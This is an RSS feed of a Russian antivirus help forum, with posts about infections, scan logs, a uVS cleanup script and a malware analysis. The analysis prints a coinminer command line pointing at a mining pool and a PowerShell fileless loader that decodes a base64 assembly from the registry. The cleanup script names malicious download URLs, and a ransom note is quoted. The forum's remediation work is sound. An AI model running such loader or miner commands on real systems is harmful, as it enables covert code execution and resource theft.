<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
    xmlns:content="http://purl.org/rss/1.0/modules/content/"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>Форум лечения заражений Обсуждение CHKLST.RU — CHKLST.RU</title>
        <link>https://chklst.ru/</link>
        <pubDate>Sat, 09 May 2026 22:26:57 +0000</pubDate>
        <language>ru</language>
            <description>Форум лечения заражений Обсуждение CHKLST.RU — CHKLST.RU</description>
    <atom:link href="https://chklst.ru/categories/help/feed.rss" rel="self" type="application/rss+xml"/>
    <item>
        <title>ЕВГЕНИЙ: Плановая проверка</title>
        <link>https://chklst.ru/discussion/1540/evgeniy-planovaya-proverka</link>
        <pubDate>Wed, 23 Mar 2016 13:00:57 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>ukh255</dc:creator>
        <guid isPermaLink="false">1540@/discussions</guid>
        <description><![CDATA[тест]]>
        </description>
    </item>
    <item>
        <title>Установила последние обновление в win 11</title>
        <link>https://chklst.ru/discussion/1954/ustanovila-poslednie-obnovlenie-v-win-11</link>
        <pubDate>Thu, 05 Dec 2024 10:58:50 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1954@/discussions</guid>
        <description><![CDATA[Здравствуйте, уважаемые хэлперы. Вчера майкрософт прислали обновления для <b>win11</b> , установила и пропало около 30 гб места на диске. Обновления не могут же занимать столько места, я думаю.  Если возможно, то посмотрите, пожалуйста, что произошло. Заранее признательна.<br /><a href="https://dropmefiles.com/TptTi" rel="nofollow">https://dropmefiles.com/TptTi</a> - полный образ автозапуска<br /><br />]]>
        </description>
    </item>
    <item>
        <title>Люся: Компьютер под угрозой.</title>
        <link>https://chklst.ru/discussion/1847/lyusya-kompyuter-pod-ugrozoy</link>
        <pubDate>Sat, 27 Jun 2020 13:22:49 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1847@/discussions</guid>
        <description><![CDATA[Здравствуйте, ребята!<br />
Перестал обновляться MSE. Ничего сделать не могу..Помогите,пожалуйста, господа хэлперы!<br /><a href="http://zalil.su/6077919" rel="nofollow">http://zalil.su/6077919</a> - ссылка на полный образ автозапуска.]]>
        </description>
    </item>
    <item>
        <title>Вопросы и обсуждение различных средств удаления вирусов</title>
        <link>https://chklst.ru/discussion/1552/voprosy-i-obsuzhdenie-razlichnyh-sredstv-udaleniya-virusov</link>
        <pubDate>Sat, 07 May 2016 08:20:08 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1552@/discussions</guid>
        <description><![CDATA[в <a rel="nofollow" href="https://toolslib.net/downloads/viewdownload/1-adwcleaner/"><b>AdwCleane</b></a>r-е (v 5.115) все больше становится рабочих и полезных твиков. Размер исполняемого файла заметно увеличился. (до 3мб). Видимо добавлена локальная база для детектирования.

<img src="http://chklst.ru/uploads/editor/p5/868e0y0cf03z.jpg" alt="" />


ESET выпустил бетку <a rel="nofollow" href="https://www.eset.com/int/beta/edition2017/"><b>ESET Internet Security 10</b></a>, судя по настройкам, добавлена какая то работа с ransomware, надо потестировать на реальных шифраторах.

<img width="600" src="http://chklst.ru/uploads/editor/yc/5my7oem7f4nj.jpg" alt="" />






]]>
        </description>
    </item>
    <item>
        <title>Как Давид победил Голиафа</title>
        <link>https://chklst.ru/discussion/1937/kak-david-pobedil-goliafa</link>
        <pubDate>Tue, 07 Feb 2023 07:28:29 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1937@/discussions</guid>
        <description><![CDATA[К нам обратился Давид с вопросом, почему не все модули защиты включены после установки антивируса Pro32 Total Security. Так же он не смог активировать программу и обновить антивирусные базы.<br /><br /><img src="https://chklst.ru/uploads/editor/2p/a4e7esca4rp6.jpg" alt="a4e7esca4rp6.jpg" /><br /><br />
С его слов, он не смог установить Avast и Kaspersky, а техподдержка не смогла решить вопрос.<br />
Давид предусмотрительно выполнил сканирование системы и предоставил диагностические логи.<br />
Что же мы видим по логам:<br /><pre spellcheck="false" tabindex="0">;================ Запуск результатов сканирования ==================&#13;
17-01-2023 12:18	C:\Program Files\RDP Wrapper\rdpwrap.dll	is an Unwanted-Program ( 00555edb1 )	Невозможно поместить в карантин&#13;
17-01-2023 13:16	C:\ProgramData\RunDLL\rundll.exe	is a Trojan ( 005292541 )	Невозможно поместить в карантин&#13;
17-01-2023 13:16	C:\ProgramData\RunDLL\system.exe	is an Exploit ( 005560f51 )	Невозможно поместить в карантин&#13;
17-01-2023 13:17	C:\ProgramData\Windows Tasks Service\winserv.exe	is an Unwanted-Program ( 005442fc1 )	Невозможно поместить в карантин&#13;
17-01-2023 13:17	C:\ProgramData\WindowsTask\MicrosoftHost.exe	is an Adware ( 0055fa291 )	Невозможно поместить в карантин&#13;
17-01-2023 13:42	C:\Windows\KMS-R@1nHook.dll	is an Unwanted-Program ( 004d38111 )	Невозможно поместить в карантин&#13;
17-01-2023 15:01	C:\Windows\SysWOW64\mintcastnetworks.dll	is a Trojan ( 0001140e1 )	Невозможно поместить в карантин&#13;
17-01-2023 13:17	C:\ProgramData\WindowsTask\win.exe	Файл зашифрован!	Ожидается действие ( Не подлежит лечению )&#13;
17-01-2023 13:16	C:\ProgramData\RunDLL\2x64.dll	is a Riskware ( 0040eff71 )	Был удален&#13;
17-01-2023 13:16	C:\ProgramData\RunDLL\2x86.dll	is a Trojan-Downloader ( 00536df71 )	Был удален&#13;
&#13;
;------------------- Отчет-------------------&#13;
;Найденные файлы: 245056&#13;
;Просканированные файлы: 243605&#13;
;Зараженные файлы: 65&#13;
;Таблица разделов просканирована: 0&#13;
;просканировано загрузочных секторов : 0&#13;
;Проблемы, которые необходимо исправить: 7&#13;
;================ Конец результатов сканирования ==================
</pre>
<br /><img src="https://chklst.ru/uploads/editor/7k/556d55k8ae61.jpg" alt="556d55k8ae61.jpg" /><br /><br />
Логи нас приятно удивили, не потому что система оказалась основательно поражена и заражена, а потому что в этой пораженной системе антивирус PRO32 Total Security смог установиться и обойти все «защитные доспехи и барьеры» этого поистине вирусного Голиафа: множественное активное заражение системы с процедурой восстановления через WMI, блокировку запуска установщиков антивирусных программ, блокировку путей установки антивирусных программ, блокировку доступа к сайтам и ресурсам антивирусных компаний и технических форумов. По словам Давида, после очистки системы вирусные файлы восстанавливались. И здесь без тонких инструментов окончательно победить Голиафа было крайне сложно.<br /><br />
План  был простой: очистить систему от Голиафа — Microsofthost.exe, далее восстановить работу модулей защиты антивирусной программы, активировать, обновить базы и выполнить контрольное полное сканирование системы.<br /><br />
Используем uVS для очистки системы. (скрипты uVS индивидуальны для каждого случая).<br /><pre spellcheck="false" tabindex="0">;uVS v4.13 [http://dsrt.dyndns.org:8888]&#13;
;Target OS: NTv6.1&#13;
v400c&#13;
OFFSGNSAVE&#13;
;------------------------autoscript---------------------------&#13;
&#13;
delref HTTP://PW.WEBPUBLIC.ORG/POWER3.TXT')||POWERSHELL.EXE&#13;
delref HTTP://PW3CLEAR.DLLCALISO.ORG/POWERC3.TXT')||POWERSHELL.EXE&#13;
delref HTTP://PWEAR.DLLCALISO.ORG/PW.TXT')||POWERSHELL.EXE&#13;
delwmi %Sys32%\CMD.EXE&#13;
delall %SystemDrive%\PROGRAMDATA\WINDOWS TASKS SERVICE\WINSERV.EXE&#13;
zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\AUDIODG.EXE&#13;
addsgn 1A6E769A552B1E3B8236EFE32D4360156C0186D675489FF2838B3A7AD8D139B3E4ACC1573E559D9B5E870E890EE98FEAAFAC0C7287AFB7A63B3F5BE9D7D4512D 8  Win64/Packed.Themida.L 7&#13;
&#13;
zoo %SystemDrive%\PROGRAMDATA\REALTEK\TASKHOST.EXE&#13;
addsgn BA6F9BB2BDD5FF720B9C2D754C2124FBDA75303A02FF85B08FC3813792F5BB0DD4C78774FE1196886F09811A8E1C4939355C045ABD5D982C2D3F21EFB30C9B65 23 Win64/CoinMiner.ACX 7&#13;
&#13;
zoo %SystemDrive%\PROGRAMDATA\REAITEKHD\TASKHOST.EXE&#13;
zoo %SystemDrive%\PROGRAMDATA\REAITEKHD\TASKHOSTW.EXE&#13;
zoo %SystemDrive%\PROGRAMDATA\REALTEK\TASKHOSTW.EXE&#13;
zoo %SystemDrive%\PROGRAMDATA\RUNDLL\RUNDLL.EXE&#13;
addsgn 1A97749A5583D38FF42B254E3143FE8E608277F608C27C0BE823B096D3AE614F563348172A68BD4CB899F08A7B374C6964ABE64F77DF23355970992F879F2306 8 Python/Agent.BL [ESET-NOD32] 7&#13;
&#13;
zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\MICROSOFTHOST.EXE&#13;
addsgn BA6F9BB2BD5149720B9C2D754C2160FBDA75303A4536D3B4490F09709C1ABD80EFDBA531314A19492B80849F0E95A5EA3156FC561953EC08253A97F48B8B7657 21 Win64/CoinMiner.QG 7&#13;
&#13;
zoo %SystemDrive%\PROGRAMDATA\RUNDLL\SYSTEM.EXE&#13;
addsgn 1A7F749A5583368CF42BFB3A88A212FA30F69CB689056A707AD645DC10D61945271703A82B2DFD092BD07B8A327609FA201CBDF9B95B5C082E77A445D0EE667A 8 Win32/Exploit.Equation.M [ESET-NOD32] 7&#13;
&#13;
zoo %SystemDrive%\PROGRAMDATA\RUNDLL\START.EXE&#13;
addsgn 1A69149A5583348CF42B254E3143FE53A8CFF4A6020BF7FA793C3A7B5622B50E239C050963979949EC81705B0416A0CD802017F9AA8F3BC07BFC55E8C1F2E631 8 Python/Agent.BT 7&#13;
&#13;
zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\APPMODULE.EXE&#13;
addsgn BA6F9BB2BD514E720B9C2D754C2160FBDA75303A6039BC78850F097063164849CB00BB5431C05D8AA8A511953E1549393556B4565D8FF8A18153E4D438F96AF2 8 Win64/CoinMiner.NZ 7&#13;
&#13;
chklst&#13;
delvir&#13;
&#13;
deldirex %SystemDrive%\PROGRAMDATA\RUNDLL&#13;
&#13;
&#13;
regt 14&#13;
deltmp&#13;
;&#13;
;&#13;
;&#13;
;-------------------------------------------------------------&#13;
&#13;
restart&#13;
czoo
</pre>
<br />
После очистки системы от троянов и блокирующих элементов мы перешли к восстановлению работы антивирусной программы.<br />
Выяснилось, что причиной незапуска служб может быть отсутствие прав системы для файлов каталога K7Computing<br /><br /><img src="https://chklst.ru/uploads/editor/sv/lmi1cmw2t3x4.jpg" alt="lmi1cmw2t3x4.jpg" /><br /><br />
Добавили Систему с соответствующими разрешениями, все службы антивируса штатно запустились и все модули защиты включились. <img src="https://chklst.ru/resources/emoji/smile.png" title=":)" alt=":)" height="20" />.<br /><br /><img src="https://chklst.ru/uploads/editor/n8/i4eyqtkrybkm.jpg" alt="i4eyqtkrybkm.jpg" /><br /><br />
Добавили дополнительно права Системы на другие каталоги и заработало обновление антивирусных баз.<br /><br />
После успешного обновления Давид смог выполнить полное сканирование системы, но к этому моменту остатки Голиафа были найдены только в карантинах. <img src="https://chklst.ru/resources/emoji/smile.png" title=":)" alt=":)" height="20" />.<br /><br />
(с), chklst.ru<br /><br />]]>
        </description>
    </item>
    <item>
        <title>suvandre: плановая проверка</title>
        <link>https://chklst.ru/discussion/1578/suvandre-planovaya-proverka</link>
        <pubDate>Fri, 23 Dec 2016 07:56:39 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1578@/discussions</guid>
        <description><![CDATA[здесь<br /><blockquote>

<div>Плановая проверка<br />
логи uVS 1ый компьютер <a href="http://rgho.st/8VpTl5hBk" rel="nofollow">http://rgho.st/8VpTl5hBk</a></div>
</blockquote>
]]>
        </description>
    </item>
    <item>
        <title>lsass нагружает ЦП/использует много физической памяти</title>
        <link>https://chklst.ru/discussion/1843/lsass-nagruzhaet-cp-ispolzuet-mnogo-fizicheskoy-pamyati</link>
        <pubDate>Mon, 25 May 2020 06:59:21 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1843@/discussions</guid>
        <description><![CDATA[Несколько тем ("lsass грузит ЦП") с форума <b>virusinfo.info</b>, которые подчеркивают уникальность функций <b>Universal Virus Sniffer</b>, в частности, обнаружение внедренных потоков в легальные, в том числе и системные процессы:<br /><a href="https://virusinfo.info/showthread.php?t=225067" rel="nofollow">https://virusinfo.info/showthread.php?t=225067</a><br /><a href="https://virusinfo.info/showthread.php?t=224966" rel="nofollow">https://virusinfo.info/showthread.php?t=224966</a><br /><br />
по второй ссылке решение, к сожалению, не было доведено до конца,<br />
по первой ссылки у пользователя и хелперов хватило времени и терпения, чтобы проверить состояние системы из всех положений: нормального, безопасного, и пассивного из под Live USB<br /><br />
Образ автозапуска из uVS из нор. режима подтвердил наличие скрытого процесса, который внедряет потоки и нагружает процесс lsass.<br /><blockquote>

<div>(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\LSASS.EXE [548], tid=4256<br />
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\LSASS.EXE [548], tid=4280<br />
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\LSASS.EXE [548], tid=4284</div>
</blockquote>
<b>tdsskiller</b> ничего не обнаружил из норм. режима<br /><blockquote>

<div>19:02:56.0459 0x0d80  TDSS rootkit removing tool 3.1.0.28 Apr  9 2019 21:11:46<br />
19:02:56.0974 0x0d80  ============================================================­<br />
19:02:56.0974 0x0d80  Current date / time: 2020/05/22 19:02:56.0974<br /><br />
19:03:18.0373 0x0c24  ============================================================­<br />
19:03:18.0373 0x0c24  Scan finished<br />
19:03:18.0373 0x0c24  ============================================================­<br />
19:03:18.0373 0x0dac  Detected object count: 0<br />
19:03:18.0373 0x0dac  Actual detected object count: 0</div>
</blockquote>
<br /><b>FRST</b> нашел заблокированные каталоги и файлы:<br /><blockquote>

<div>==================== FLock ==============================<br /><br />
2020-05-22 12:46 C:\Windows\speechstracing<br />
2020-05-22 16:23 C:\Windows\system32\config\SYSTEM<br />
2020-05-18 19:49 C:\Windows\system32\Drivers\Wdf10283.sys</div>
</blockquote>
<br />
обнаружить, удалить, или получить копию данного драйвера не получается из нормального, и безопасного режима,<br />
зато из под winpe возможно уже легко обнаружить и зачистить систему.<br /><blockquote>

<div>C:\WINDOWS\SYSTEM32\DRIVERS\WDF10283.SYS<br />
a variant of Win64/Agent.KD<br />
Действительна, однако сертификат УСТАРЕЛ<br />
Xtreaming Technology Inc.<br />
HKLM\uvs_system\ControlSet001\Services\{45487F67-EC9F-4449-A6F2-2D0970F9B80B}\ImagePath<br />
system32\drivers\Wdf10283.sys<br />
тип запуска: На этапе загрузки (0)<br /><br />
Цитата<br />
Загружен скрипт: F:\Support\COMP.TXT<br />
======= Начало исполнения скрипта =======
<hr />
v400c
<hr /><hr />
OFFSGNSAVE
<hr /><hr />
zoo %Sys32%\DRIVERS\WDF10283.SYS
<hr />
Копирование файла в Zoo: \\?\C:\WINDOWS\SYSTEM32\DRIVERS\WDF10283.SYS<br />
Файл скопирован в ZOO: F:\SUPPORT\ZOO\WDF10283.SYS._0FC2A538715B6E8A11AC95BB79338AD379B0C830
<hr />
addsgn 9AFB8488CB82BB1509D49FC070335BDF939E470451A9F4BCFB99DF57546A­527C372C97CE664166E35C0A6FDBCA385911799153EBBE9E75957E639F66­9E993648 32 Trojan:Win64/CryptInject!MTB[Microsoft] 7
<hr />
Добавлена сигнатура: Trojan:Win64/CryptInject!MTB[Microsoft]
<hr />
chklst
<hr /><hr />
Проверка списка...
<hr />
Не удалось открыть файл: C:\WINDOWS\SYSTEM32\WBEM\\WMIPJOBJ.DLL<br />
Проверено файлов: 2942<br />
Найдено вирусов: 1
<hr />
delvir
<hr /><hr />
Применение изменений...
<hr />
Копирование файла в Zoo: C:\WINDOWS\SYSTEM32\DRIVERS\WDF10283.SYS<br />
Файл скопирован в ZOO: F:\SUPPORT\ZOO\WDF10283.SYS._0FC2A538715B6E8A11AC95BB79338AD379B0C830<br />
Удаление ссылок...<br />
Удаление файлов...
<hr />
Завершено процессов: 0 из 0<br />
Изменено/удалено объектов автозапуска 1 из 1<br />
Удалено файлов: 1 из 1</div>
</blockquote>
<br />
В итоге:<br /><br /><b>Rootkit.Win64.Agent.bfi</b><br /><br />]]>
        </description>
    </item>
    <item>
        <title>Trojan.Multi.GenAutorunProc.a</title>
        <link>https://chklst.ru/discussion/1841/trojan-multi-genautorunproc-a</link>
        <pubDate>Thu, 19 Mar 2020 01:32:21 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1841@/discussions</guid>
        <description><![CDATA[по активным некоторое время назад темам Trojan.Multi.GenAutorunProc.a что можно сказать.<br /><br />
симптомы, пример:<br /><blockquote>

<div>заметил, что моя любимая игрушка начала тормозить, включил msi afterburner с выводом информации про загрузку и температуру процессора на экран, загрузка достигала 50-100% на всех 8 ядрах. Решил открыть диспетчер задач, он показал что процессор загружен на 10-15%, не закрывая диспетчер задач зашел в игру, мси афтербернер показал 10-15%, игра перестала тормозить, закрыл диспетчер задач и игра снова стала тормозить. Я скачал прогу system explorer и она показала запущенный процесс notepad.exe, который потребляет 37,5% процессора. при открытии снова диспетчера задач, notepad.exe скрылся из запущенных процессов в system explorer, после закрытия диспетчера задач, notepad.exe снова запустился.</div>
</blockquote>
<br />
довольно интересная картина происходит, которая может быть скрыта за текстовыми логами.<br /><br />
есть свежая задача <b>Win32Utilities</b>, из которой запущена dll<br />
C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll<br />
6,00 кб, rsAh, создан: 03.03.2020 19:11:07, изменен: 03.03.2020 19:39:19<br />
следующим образом:<br />
rundll32.exe C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll,Task<br />
и все.<br /><br />
что мы видим в образе автозапуска:<br />
во первых обнаружены потоки внедренные в процесс notepad.exe<br /><b>(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\NOTEPAD.EXE [1860], tid=9912</b><br />
во вторых, видим процесс, связанный так или иначе с запуском notepad.exe, явно связанный с майнером<br /><blockquote>

<div>notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0</div>
</blockquote>
а так же видим процессы связанные с запуском powershell<br /><blockquote>

<div>"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);</div>
</blockquote>
<br />
судя по командной строке, часть командной строки формируется из ключа HKCU:\Software\WinSys32, можно предположить, что значение ключа закодировано в base64<br /><br />
каким образом запущены процессы с участием powershell?<br /><br />
а вот отсюда, часть содержимого windowsdiagnostic.dll:<br /><blockquote>

<div>p o w e r s h e l l  ‚%- E x e c u t i o n P o l i c y   B y p a s s   - N o E x i t   - N o P r o f i l e   - C o m m a n d   $ s   =   ( G e t - I t e m P r o p e r t y   H K C U : \ S o f t w a r e \ W i n S y s 3 2 \ ) . w i n ; $ r   =   $ s . r e p l a c e ( ' . ' ,   ' 2 ' ) . r e p l a c e ( ' ( ' ,   ' 3 ' ) . r e p l a c e ( ' - ' ,   ' 1 ' ) ;   $ b   =   [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r ) ; [ S y s t e m . R e f l e c t i o n . A s s e m b l y ] : : L o a d ( $ b ) ; [ G A S . A d ] : : C U ( ) ; E x i t ( 0 )</div>
</blockquote>
<br />
какая связь между процессом powershell и notepad?<br /><br />
а вот и явная связь.<br /><br />
по образу видим, что pid=8960 соответствует cmdline:<br /><blockquote>

<div>"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);</div>
</blockquote>
а в инфо по notepad видим, что pid=1860 созданный cmdline<br /><blockquote>

<div>"notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0"</div>
</blockquote>
но родительский процесс для него parentid=8960<br /><br />
остается найти значение ключа HKCU:\Software\WinSys32, чтобы убедиться, что в нем содержится base64 значение:<br /><br />
действительно, ключ содержит base64 код<br /><blockquote>

<div>Windows Registry Editor Version 5.00<br /><br />
[HKEY_CURRENT_USER\Software\WinSys32]<br />
"win"="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc­m9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG-vZGUuDQ0KJAAAAAAAAABQRQAAZIYDAJPF0tgAAAAAAAAAAPAALiALAgYAAPo­AAAAIAAAAAAAAAAAAAAAgAAAAAEAAAAAAAAAgAAAAAgAABAAAAAAAAAAEAAA­AAAAAAABgAQAABAAAAAAAAAMAQIUAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAA­AEAAAAAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAAAAAAABAAQAABAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAghgBABwAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAggAABIAAA­AAAAAAAAAAAAudGV4dAAAACT5AAAAIAAAAPoAAAAEAAAAAAAAAAAAAAAAAAA­gAABgLnNkYXRhAAD-AQAAACABAAACAAAA/gAAAAAAAAAAAAAAAAAAQAAAwC5yc(JjAAAAAAQAAABAAQAABAAAAAABAAAAAAAAAAAAAAAAAEAAAEAucmVsb.MAAAwAAAAAYAEAAAIAAAAEAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAA</div>
</blockquote>
<br />
после декодирования получаем бинарный файл<br /><br /><img src="https://chklst.ru/uploads/editor/dy/eyq8ka4j3l28.png" alt="eyq8ka4j3l28.png" /><br /><br />
+<br />
теперь вирлаб детектирует его как майнер.<br /><a href="https://www.virustotal.com/gui/file/bdca7dd1be0f230efd68cfb824b73a7bf0e326ed39147011b5f858370d9e2869/detection" rel="nofollow">ESET-NOD32:      <b>A Variant Of MSIL/CoinMiner.BDW</b></a><br /><br />]]>
        </description>
    </item>
    <item>
        <title>Случайно подхватил вирус который зашифровал мои файлы</title>
        <link>https://chklst.ru/discussion/1837/sluchayno-podhvatil-virus-kotoryy-zashifroval-moi-fayly</link>
        <pubDate>Tue, 03 Mar 2020 03:21:23 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1837@/discussions</guid>
        <description><![CDATA[<b>Russivak:</b><br />
Доброго времени.Может Вы мне поможете.Случайно подхватил вирус который зашифровал почти все мои файлы.Букваль но за минут 5.Когда я спохватился сразу вырубил комп.Но проц.90 уже было зашифровано в формате .nosu Может Вы мне поможете советом.<br /><br /><a href="https://drive.google.com/open?id=1W35HjnCgaPRFSxbIwLVBQBTsxpQMvFYl" rel="nofollow">https://drive.google.com/open?id=1W35HjnCgaPRFSxbIwLVBQBTsxpQMvFYl</a><br /><br />
это фотография которая зашифровалась<br /><br />
Текст выкупа слдующий...<br /><blockquote>

<div>ATTENTION!<br /><br />
Don't worry, you can return all your files!<br />
All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.<br />
The only method of recovering files is to purchase decrypt tool and unique key for you.<br />
This software will decrypt all your encrypted files.<br />
What guarantees you have?<br />
You can send one of your encrypted file from your PC and we decrypt it for free.<br />
But we can decrypt only 1 file for free. File must not contain valuable information.<br />
You can get and look video overview decrypt tool:<br /><a href="https://we.tl/t-Oc0xgfzC7q" rel="nofollow">https://we.tl/t-Oc0xgfzC7q</a><br />
Price of private key and decrypt software is $980.<br />
Discount 50% available if you contact us first 72 hours, that's price for you is $490.<br />
Please note that you'll never restore your data without payment.<br />
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.<br /><br /><br />
To get this software you need write on our e-mail:<br />
helpmanager@firemail.cc<br /><br />
Reserve e-mail address to contact us:<br />
helpmanager@iran.ir<br /><br />
Your personal ID:<br />
0197nTsddc0RliqQe05lgLmqgyYsmR6pB1gd8qDmnDCDgjrvu</div>
</blockquote>
]]>
        </description>
    </item>
    <item>
        <title>Взломали почту..</title>
        <link>https://chklst.ru/discussion/1640/vzlomali-pochtu</link>
        <pubDate>Sat, 28 Sep 2019 15:27:08 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1640@/discussions</guid>
        <description><![CDATA[Здравствуйте уважаемые хэлперы! Сегодня, пока я спала, кто-то из города Баку заходил в мою почту..Напрягает это.<br />
Полный образ автозапуска сделала..<br /><br />]]>
        </description>
    </item>
    <item>
        <title>после заражения не могу очистить систему</title>
        <link>https://chklst.ru/discussion/1636/posle-zarazheniya-ne-mogu-ochistit-sistemu</link>
        <pubDate>Fri, 12 Jul 2019 22:56:48 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>lenn11</dc:creator>
        <guid isPermaLink="false">1636@/discussions</guid>
        <description><![CDATA[здравствуйте. не получается полностью очистить  компьютер от  заражения после того как скачала крякнутую программу.проверяла разными антивирусами и тд.. что то нашлось,удаляла,но не все. нортон нашел вирус в реестре,а  удалить не смог и ту же самую инфекцию постоянно находит Rkill! удалить это не получается,перепробовала многое.так же, случайно увидила при просмотре диспетчера задач,в процессах,все время отображаются несколько вкладок браузера аваст,при том, что сам браузер не  запущен.отключила службу автообновления,но это не сработало.что странно, в свойствах процесса-вкладка безопасность,имя пользователя обозначена незнакомая учетная запись. и это та же ветка реестра,в которой нортон и  Rkill находят тот самый  не убиваемый вирус.далее проверила утилитой RogueKiller,во вкладке процессы был обнаружен nokill tr.zeus.я не очень разобралась как работает эта прога,вроде бы она лишь находит вред проц,но не удаляет сами файлы..в общем, после 1 очистки ничего не поменялось и  при повторной проверке тот же процесс был обнаружен снова, только с новым PID.после повторной очистки зараженный процесс больше выявлен не был.как обстоит дело  на самом деле,остался ли  троян в системе, понять не могу((.но Rkill продолжает находить всю ту же  заразу  в реестре. помогите  пож разобраться.заранее  спасибо!]]>
        </description>
    </item>
    <item>
        <title>Восстановление баз данных 1С. В формате SQL.</title>
        <link>https://chklst.ru/discussion/1635/vosstanovlenie-baz-dannyh-1s-v-formate-sql</link>
        <pubDate>Mon, 17 Jun 2019 12:24:53 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>s_pol</dc:creator>
        <guid isPermaLink="false">1635@/discussions</guid>
        <description><![CDATA[Часть баз данных на сервере, оказалась зашифрована. В каталоге баз данных имя базы прежнее, но с расширением PZDC.]]>
        </description>
    </item>
    <item>
        <title>Невозможно установить антивирус</title>
        <link>https://chklst.ru/discussion/1631/nevozmozhno-ustanovit-antivirus</link>
        <pubDate>Tue, 30 Apr 2019 03:51:53 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Max</dc:creator>
        <guid isPermaLink="false">1631@/discussions</guid>
        <description><![CDATA[Здравствуйте, сразу хочу сказать, что антивирус ESET лицензионный, почему на форуме странные правила не понимаю.<br />
Посоветовали создать тему тут:<br /><blockquote>

<div>если этот файлик попал в карантин ESET<br />
C:\USERS\ELENA\APPDATA\LOCAL\TEMP\SETH.BAT<br />
пробуйте восстановить его с другим расширением, например, *.vvvbat и добавить его в архиве на форум</div>
</blockquote>
<br /><a href="https://www.sendspace.com/file/amgmtq" rel="nofollow">https://www.sendspace.com/file/amgmtq</a> пароль на архив 123 иначе ESET его убивает
<blockquote>

<div>вопрос:<br />
кейлоггер<br />
Trojan.RefogKeyLogger, C:\ProgramData\MPK\MIPKO Employee Monitor\MIPKO Employee Monitor.lnk, Помещено в карантин, [1258], [180776],1.0.10268<br />
сами ставили в системе?</div>
</blockquote>
Сам ничего не ставил, перед этим никакие ПО тоже не ставил. Недели полторы точно.]]>
        </description>
    </item>
    <item>
        <title>Первые шаги в работе с заражением Ransomware</title>
        <link>https://chklst.ru/discussion/1628/pervye-shagi-v-rabote-s-zarazheniem-ransomware</link>
        <pubDate>Sat, 05 Jan 2019 04:05:19 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1628@/discussions</guid>
        <description><![CDATA[Инфекции вымогателей могут быть уникальными во многих отношениях. Самое главное, что привычки, которые обычно правильны при работе с вредоносными программами, могут ухудшить ситуацию при работе с вымогателями. Пожалуйста, ознакомьтесь с приведенной ниже инструкцией в качестве руководства по борьбе с заражением вымогателями.<br /><br /><b>Не удаляйте сразу тела файлов шифраторов</b><br />
